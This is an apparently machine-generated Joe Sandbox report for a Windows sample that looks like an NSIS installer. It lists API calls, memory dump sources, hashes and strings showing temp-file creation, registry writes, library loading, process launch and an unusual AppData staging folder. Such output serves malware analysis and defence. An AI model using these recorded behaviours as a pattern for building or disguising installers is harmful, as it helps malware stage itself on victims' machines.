                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                  • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                  • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                  • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                  • wsprintfW.USER32 ref: 0040663E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                  • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                  • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                  • GetLastError.KERNEL32 ref: 0040580C
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                  • GetLastError.KERNEL32 ref: 0040582B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 3449924974-224404859
                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                  • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                  • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405DC1
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\3507071243740008011.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3909342656
                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                  • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                  • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                    • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                  • String ID:
                                                  • API String ID: 1791698881-3916222277
                                                  • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                  • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                  • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                  • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000023,00000011,00000002), ref: 00402429
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402469
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402551
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp
                                                  • API String ID: 2655323295-1089519228
                                                  • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                  • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                  • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                  • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                  • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                  • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                  • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                  APIs
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                  • API String ID: 1892508949-3139891972
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405289
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                    • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                  • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                  • CloseHandle.KERNEL32(?), ref: 0040589D
                                                  Strings
                                                  • Error launching installer, xrefs: 0040587A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                  • GetLastError.KERNEL32 ref: 10002A62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402551
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  APIs
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                  • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                  • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID:
                                                  • API String ID: 3248276644-0
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                  • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                  • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                  • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                    • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                    • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                    • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                  • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                  • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                  • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
